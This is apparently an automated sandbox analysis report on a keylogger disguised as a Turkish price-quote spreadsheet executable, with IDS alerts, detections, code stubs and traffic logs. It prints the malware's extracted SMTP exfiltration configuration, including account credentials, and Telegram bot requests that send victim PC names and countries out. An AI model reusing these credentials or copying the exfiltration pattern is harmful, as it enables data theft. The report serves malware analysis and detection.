2024-09-26T09:00:31.700266+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49728	132.226.8.169	80	TCP
2024-09-26T09:00:34.794104+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49732	132.226.8.169	80	TCP
2024-09-26T09:00:37.262765+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49737	132.226.8.169	80	TCP
2024-09-26T09:00:39.522152+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49740	132.226.8.169	80	TCP
2024-09-26T09:00:41.153367+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49742	132.226.8.169	80	TCP
2024-09-26T09:00:43.453085+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49744	132.226.8.169	80	TCP
2024-09-26T09:00:44.950287+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49746	132.226.8.169	80	TCP
2024-09-26T09:00:46.922610+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49748	132.226.8.169	80	TCP
2024-09-26T09:00:48.418997+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49750	132.226.8.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49713 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49731 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49752 version: TLS 1.2

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: sZXF.pdbSHA256 source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, OnCgVRIhY.exe.0.dr
Source:	Binary string: sZXF.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, OnCgVRIhY.exe.0.dr

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 06C121FFh	0_2_06C126CC
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 0167F8E9h	9_2_0167F631
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 0167FD41h	9_2_0167FA88
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B97A5Dh	9_2_05B97720
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B98E28h	9_2_05B98B58
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9C866h	9_2_05B9C598
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9E856h	9_2_05B9E588
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B918A1h	9_2_05B915F8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B96869h	9_2_05B965C0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B90FF1h	9_2_05B90D48
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B90741h	9_2_05B90498
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then mov esp, ebp	9_2_05B9AC31
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9BF46h	9_2_05B9BC78
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9DF36h	9_2_05B9DC68
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then mov esp, ebp	9_2_05B9AC40
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B95A29h	9_2_05B95780
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9BAB6h	9_2_05B9B7E8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9DAA6h	9_2_05B9D7D8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9FA96h	9_2_05B9F7C8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B92A01h	9_2_05B92758
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9D186h	9_2_05B9CEB8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B92151h	9_2_05B91EA8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9F176h	9_2_05B9EEA8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B95179h	9_2_05B94ED0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9B196h	9_2_05B9AEC8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B948C9h	9_2_05B94620
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B97119h	9_2_05B96E70
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B91449h	9_2_05B911A0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B94471h	9_2_05B941C8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9C3D6h	9_2_05B9C108
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9E3C6h	9_2_05B9E0F8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B90B99h	9_2_05B908F0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B962DBh	9_2_05B96030
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B932B1h	9_2_05B93008
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B902E9h	9_2_05B90040
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B92E59h	9_2_05B92BB0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B95E81h	9_2_05B95BD8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9F606h	9_2_05B9F338
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B955D1h	9_2_05B95328
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B925A9h	9_2_05B92300
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9B626h	9_2_05B9B358
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9D616h	9_2_05B9D348
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B97571h	9_2_05B972C8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9CCF6h	9_2_05B9CA28
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B96CC1h	9_2_05B96A18
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B9ECE6h	9_2_05B9EA18
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B94D21h	9_2_05B94A78
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 4x nop then jmp 05B91CF9h	9_2_05B91A50
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 075914BFh	10_2_0759198C
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_014FF4C0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_014FFAF3
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BF2131h	14_2_06BF1E80
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BF26F8h	14_2_06BF22E0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BF021Dh	14_2_06BF0040
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BF0BA7h	14_2_06BF0040
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFE531h	14_2_06BFE288
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFE989h	14_2_06BFE6E0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BF26F8h	14_2_06BF22D6
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFE0D9h	14_2_06BFDE30
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BF26F8h	14_2_06BF2626
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFF239h	14_2_06BFEF90
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFF691h	14_2_06BFF3E8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFEDE1h	14_2_06BFEB38
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFCF79h	14_2_06BFCCD0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFC6C9h	14_2_06BFC420
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFCB21h	14_2_06BFC878
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFFAE9h	14_2_06BFF840
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFD829h	14_2_06BFD580
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFDC81h	14_2_06BFD9D8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 4x nop then jmp 06BFD3D1h	14_2_06BFD128

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2026/09/2024%20/%2022:26:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2027/09/2024%20/%2004:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49746 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49744 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49750 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49740 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49728 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49732 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49718 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49748 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49737 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49742 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49747 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49749 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49726 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49716 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49713 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49731 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2026/09/2024%20/%2022:26:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
